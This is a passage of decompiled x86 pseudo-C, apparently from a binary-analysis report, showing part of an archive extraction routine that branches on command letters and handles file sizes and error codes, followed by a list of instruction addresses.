									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E00841001(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E00838147(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E00836FEC(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E0083A255(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E00837C7E(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E00838113(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E0083C6D1(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L0083E75A(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E008394D4(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E008320F0(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E00839506(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00831E8B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E0083A7CC(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8))); // executed
																									E0083A7CC(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E0083C719(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E008428B5(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E0084254C( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E008391A3(_t574, _t608, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E00831E8B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E0083A1D3(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E00831F29(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E00839C7A(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E00839B22(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E00839572(_t340);
																																						E00837B05( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
																																						E00839B1F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t613;
																																				if(_t613 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t460 =  *(_t683 + 8);
																																			__eflags =  *((char*)(_t460 + 0x6198));
																																			if( *((char*)(_t460 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																			goto L200;
																																		}
																																		__eflags = _t611;
																																		if(_t611 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t574 + 0x3380) - 5;
																																		if( *(_t574 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t674;
																																		if(_t674 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t574 + 0x3380) - 4;
																																if( *(_t574 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t674;
																																if(_t674 == 0) {
																																	goto L189;
																																}
																																_t611 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x12));
																															if( *((char*)(_t706 - 0x12)) == 0) {
																																goto L185;
																															}
																															__eflags = _t610;
																															if(_t610 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
																															if(__eflags == 0) {
																																L183:
																																_t311 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(3);
																																L184:
																																E00831F29(__eflags);
																																 *((char*)(_t706 - 0xe)) = 1;
																																E00836F18(0x8700e0, 3);
																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
																																L181:
																																__eflags =  *((char*)(_t683 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t309 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t574 + 0x6cc4) - _t610;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t574 + 0x32e4) - _t436;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t610;
																															if(_t610 != 0) {
																																 *((char*)(_t683 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t574 + 0x32e0) - _t436;
																														if( *(_t574 + 0x32e0) <= _t436) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t683 + 0xf3)) = _t436;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t469 = E0083A79A(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
																												__eflags = _t469;
																												if(_t469 == 0) {
																													goto L166;
																												}
																												_t610 = 1;
																												_t436 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t574 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_t262 = _t706 - 0x41a8; // -14760
																												E00838147(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												__eflags = _t608;
																												if(_t608 == 0) {
																													L153:
																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
																													L154:
																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t608;
																														if(_t608 == 0) {
																															L157:
																															_t480 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t683 + 0x10f5) = _t480;
																															goto L163;
																														}
																														L142:
																														__eflags = _t479;
																														if(_t479 == 0) {
																															goto L157;
																														}
																														_t480 = 1;
																														goto L158;
																													}
																													__eflags = _t608;
																													if(_t608 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x12)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t266 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t683 + 0x10f6);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t574 + 0x1e);
																													_t269 = _t706 - 0x2160; // -6496
																													_t479 = E008390E1(_t683, _t673, __eflags);
																												} else {
																													_t479 = E008375D0(_t608, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xd)) = _t479;
																												__eflags = _t479;
																												if(_t479 == 0) {
																													L139:
																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
																													goto L140;
																												}
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t434;
																											if(_t702 == _t434) {
																												L144:
																												__eflags = _t608;
																												if(_t608 == 0) {
																													goto L153;
																												}
																												_push(_t683 + 0x10f6);
																												_t479 = E0083783F(_t673, _t683 + 0x10, _t574);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00831F29(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
																											__eflags = 0;
																											_t479 = 0;
																											 *((char*)(_t706 - 0xd)) = 0;
																											goto L139;
																										}
																										__eflags = _t432;
																										if(_t432 != 0) {
																											goto L131;
																										}
																										_t491 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t491;
																										if( *(_t706 - 0x18) == _t491) {
																											goto L131;
																										}
																										_t434 = 1;
																										_t608 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t574 + 0x6cc4);
																									if( *(_t574 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t703 =  *(_t574 + 0x32e4);
																									_t681 =  *(_t574 + 0x32e0);
																									__eflags = _t703;
																									if(__eflags < 0) {
																										L126:
																										_t698 = _t683 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t631 =  *(_t574 + 0x32d8);
																										_t632 = _t631 << 0xa;
																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
																										if(__eflags < 0) {
																											L125:
																											_t432 =  *(_t706 + 0xb);
																											_t608 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t703;
																											if(__eflags < 0) {
																												L124:
																												_t237 = _t706 - 0x2160; // -6496
																												E00839979(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t499 = E00839779(_t574, _t681);
																												__eflags = _t681 -  *(_t574 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t499 -  *(_t574 + 0x32d8);
																												if(_t499 <=  *(_t574 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t681 - 0x5f5e100;
																											if(_t681 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t632 - _t681;
																										if(_t632 <= _t681) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t681 - 0xf4240;
																									if(_t681 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t198 = _t683 + 0xe4;
																								 *_t198 =  *(_t683 + 0xe4) + 1;
																								__eflags =  *_t198;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0xf)) = 0;
																							_t501 = 0x50;
																							__eflags = _t696 - _t501;
																							if(_t696 != _t501) {
																								_t192 = _t706 - 0x2160; // -6496
																								__eflags = E008397E9(_t192);
																								if(__eflags != 0) {
																									E00831F29(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
																									E00836FB0(0x8700e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t683 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) != 0) {
																							_t423 =  *(_t706 + 0xb);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 + 0xb) = 1;
																					 *(_t706 + 0xf) = 1;
																					_t182 = _t706 - 0x113c; // -2364
																					_t511 = E00841001(_t601, _t182, 0, 0, 1);
																					__eflags = _t511;
																					if(_t511 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t184 = _t706 - 0x2160; // -6496
																					E00839506(_t184);
																					_t393 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t174 = _t706 - 0x2160; // -6496
																				_push(_t574);
																				_t515 = E00837FF5(_t683);
																				_t696 =  *(_t706 - 0x18);
																				_t601 = _t515;
																				 *(_t706 + 0xf) = _t601;
																				L93:
																				__eflags = _t601;
																				if(_t601 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 + 0xf);
																			if( *(_t706 + 0xf) != 0) {
																				_t516 =  *(_t706 - 0x18);
																				__eflags = _t516 - 0x50;
																				if(_t516 != 0x50) {
																					_t639 = 0x49;
																					__eflags = _t516 - _t639;
																					if(_t516 != _t639) {
																						_t640 = 0x45;
																						__eflags = _t516 - _t640;
																						if(_t516 != _t640) {
																							_t517 =  *(_t683 + 8);
																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
																								_t172 = _t706 - 0x113c; // -2364
																								_push(_t574);
																								E00837E31(_t683);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t418 - 5;
																		if(_t418 == 5) {
																			goto L83;
																		}
																		_t601 =  *(_t706 + 0xf);
																		_t696 =  *(_t706 - 0x18);
																		__eflags = _t601;
																		if(_t601 == 0) {
																			goto L96;
																		}
																		__eflags = _t696 - _t670;
																		if(_t696 == _t670) {
																			goto L93;
																		}
																		_t520 =  *(_t683 + 8);
																		__eflags =  *((char*)(_t520 + 0x61f9));
																		if( *((char*)(_t520 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0xf)) = 0;
																		_t523 = E00839F0F(_t683 + 0x10f6);
																		__eflags = _t523;
																		if(_t523 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0xf));
																			if( *((char*)(_t706 - 0xf)) == 0) {
																				_t601 =  *(_t706 + 0xf);
																				goto L93;
																			}
																			L82:
																			_t601 = 0;
																			 *(_t706 + 0xf) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0xf));
																		if( *((char*)(_t706 - 0xf)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t574 + 0x32c0);
																		_t160 = _t706 - 0xf; // 0x7f1
																		E00839234(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t574 + 0x3341));
																	if( *((char*)(_t574 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t132 = _t706 - 0x2c; // 0x7d4
																	_t531 = E0084F3CA(_t574 + 0x3342, _t132, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t531;
																	if(_t531 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t574 + 0x6cc4);
																	if( *(_t574 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t683 + 0x10f4));
																	_t136 = _t706 - 0x113c; // -2364
																	_push(_t574 + 0x1e);
																	if(__eflags != 0) {
																		_push(6);
																		E00831F29(__eflags);
																		E00836F18(0x8700e0, 0xb);
																		__eflags = 0;
																		 *(_t706 + 0xf) = 0;
																		goto L73;
																	}
																	_push(0x7c);
																	E00831F29(__eflags);
																	E0083E7CD( *(_t683 + 8) + 0x5024);
																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																	_t141 = _t706 - 0x13c; // 0x6c4
																	L0083E75A(_t141);
																}
															}
															E00836F18(0x8700e0, 2);
															_t543 = E00831E8B(_t574);
															__eflags =  *((char*)(_t574 + 0x6cb4));
															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t100 = _t706 - 0x2198; // -6552
														_t545 = E00837C57(_t100, _t574 + 0x32c0);
														__eflags = _t545;
														if(_t545 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t706 - 0x219c));
														if( *((char*)(_t706 - 0x219c)) == 0) {
															L59:
															 *(_t706 + 0xf) = 0;
															goto L61;
														}
														_t102 = _t706 - 0x2198; // -6552
														_t547 = E00837C39(_t102, _t683);
														__eflags = _t547;
														if(_t547 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t692 - _t668;
													if(_t692 != _t668) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t398 + 0x6154));
												if( *((char*)(_t398 + 0x6154)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t683 + 0x10f6);
											if( *(_t683 + 0x10f6) == 0) {
												goto L50;
											}
											 *(_t706 + 0xf) = 1;
											__eflags =  *(_t574 + 0x3318);
											if( *(_t574 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t692 - _t387;
										_t388 = 1;
										if(_t692 != _t387) {
											goto L46;
										}
										goto L45;
									}
									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
									 *(_t706 + 0xb) = _t671;
									 *(_t706 + 0xc) = _t671;
									__eflags = _t671;
									if(_t671 == 0) {
										goto L214;
									} else {
										_t667 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
									goto L29;
								}
								__eflags =  *((char*)(_t683 + 0xf1));
								if( *((char*)(_t683 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t574 + 0x32e0) = _t665;
								 *(_t574 + 0x32e4) = _t665;
								goto L26;
							}
							__eflags =  *(_t574 + 0x32e0) - _t665;
							if( *(_t574 + 0x32e0) >= _t665) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t574 + 0x32d8) = _t665;
							 *(_t574 + 0x32dc) = _t665;
							goto L22;
						}
						__eflags =  *(_t574 + 0x32d8) - _t665;
						if( *(_t574 + 0x32d8) >= _t665) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t690 - 3;
					if(_t690 != 3) {
						L10:
						__eflags = _t690 - 5;
						if(_t690 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t574 + 0x45ac));
						if( *((char*)(_t574 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t706 - 0x18));
						_push(0);
						_push(_t683 + 0x10);
						_push(_t574);
						_t564 = E00848143(_t665);
						__eflags = _t564;
						if(_t564 != 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
							goto L15;
						} else {
							E00836F18(0x8700e0, 1);
							goto L219;
						}
					}
					__eflags =  *(_t683 + 0x10f5);
					if( *(_t683 + 0x10f5) == 0) {
						goto L217;
					} else {
						E00837A9A(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
						goto L10;
					}
				}
				if( *((intOrPtr*)(__ecx + 0x5f)) == 0) {
					L4:
					_t393 = 0;
					goto L17;
				}
				_push(_t370);
				_push(0);
				_push(__ecx + 0x10);
				_push(_t574);
				if(E00848143(0) != 0) {
					_t665 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00836F18(0x8700e0, 1);
					goto L4;
				}
			}

0x0083845d
0x00838467
0x0083846d
0x00838470
0x00838473
0x00838475
0x0083847b
0x00838482
0x00838488
0x008384b4
0x008384b5
0x008384bb
0x008384be
0x0083854d
0x00838553
0x00838559
0x00838571
0x00838571
0x00838577
0x0083858f
0x0083858f
0x00838592
0x00838598
0x008385b5
0x008385ba
0x008385be
0x008385c8
0x008385d3
0x008385d8
0x008385da
0x008385dd
0x008385e0
0x008385e2
0x008385e4
0x008385e8
0x008385ea
0x008385ec
0x008385ec
0x008385e8
0x008385f4
0x008385f9
0x008385fa
0x00838607
0x00838608
0x00838610
0x00838617
0x0083861a
0x00838671
0x00838676
0x00838678
